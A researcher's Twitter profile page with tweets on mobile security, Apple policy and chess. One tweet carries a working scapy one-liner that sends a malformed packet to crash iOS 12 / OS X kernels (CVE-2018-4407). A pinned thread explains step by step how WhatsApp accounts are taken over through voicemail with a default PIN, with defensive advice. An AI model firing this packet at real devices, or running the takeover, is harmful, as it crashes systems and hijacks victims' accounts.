Zuk
@ihackbanme
Mobile & Security Research | Founder @ZecOps (Acq. by JAMF) 🐊 & @ZIMPERIUM (Acq.) | #FreeTheSandbox✌ | ❤️ Chess | My random thoughts, only some are accurate.
California, Planet Earth
Joined December 2009
  • Pinned
    The recent WhatsApp accounts takeover is simple and genius. This is how it works: You're sleeping. A "hacker" tries to login to your account via WhatsApp. You get a text message with a pincode that says "Do not share this". You don't share it, yet you still get hacked. How?
  • iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet: pip install scapy sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
  • The author of this post found the SolarWinds attack 2-3 months before FireEye's announcement on December 8th 🤯 reddit.com/r/Solarwinds/c…
  • Replying to @ihackbanme
    How to avoid this WhatsApp account takeover? 1. Make sure that your voicemail pincode is not the default pincode. 2. Set up a 2FA pincode on your WhatsApp
  • Replying to @ihackbanme
    Next, the attackers check your voicemail simply by trying the default pincode which is the last four digits of your cellphone number in many carriers. Then they can log in to YOUR WhatsApp.
  • Replying to @ihackbanme
    The attacker clicks on the option that the SMS didn't arrive and asks for a verification by phone. WhatsApp calls you. You're sleeping. It goes to voicemail. The voicemail stores the automated voice with the pincode that the attackers are trying to obtain.
  • I'm sure that @Apple will give bootrom exploits more thinking and understand that checkm8-style exploits will happen eventually. SOLUTION: avoid embarrassment by providing an option to unlock the boot (w/ pincode). Don't fight it and lose - #FreeTheSandbox and WIN!
  • Replying to @elonmusk and @TitterDaily
    Oh you mean like the verified button?
  • Replying to @ihackbanme
    After logging in, they set up a 2FA pincode on your WhatsApp to prevent you from logging back in. The WhatsApp account recovery process takes several days - during this time they ask for $ from your contacts or spread malware.
  • So I'm telling @anishgiri what's my Chess username (TheJourneyToIM) and Anish looks on my stats and says - you should have called it "I'm The Journey" 😂🤦‍♂️ w/ @rpragchess @Rameshchess
  • Apple's latest responses collection: 1. Barking at Google Project 0 for the water hole spray attacks leveraging 14 vulnerabilities. 2. Trying to acquire Corellium and then suing them. 3. DMCA against tweets and Reddit posts (?!) This is not a trend. A thread.
  • Google and Apple will soon realize that Checkm8-style bugs are inevitable. Sandbox restrictions against device owners don't make sense and only benefit attackers. Let people who purchased devices have full control and #FreeTheSandbox! Resistance is futile!
  • Replying to @elonmusk
    Man, how's that cool? Seriously. Is that what you'd expect from a $3T company? Maybe the fan boys? But a person that builds huge rockets into space cares about this and thinks it's cool? I wish you'd be more consistent with your values and approach … but you do you.
  • This dude found a kernel RCE on PS5 via the network (!!!). "Heartbleed"-like attack using an ancient bug from 2006. Disclosed via @Hacker0x01 to @Sony. This bug allows 3rd parties to clone games (!), cheat, or APTs to persist by compromising PS5/PS4. What did he get? $12.5k 🤦‍♂️
    Pretty cool bug! 1. Insane to see a known CVE from 2006 providing Remote kernel RW. 2. Only $12.5k ?? Not cool @Sony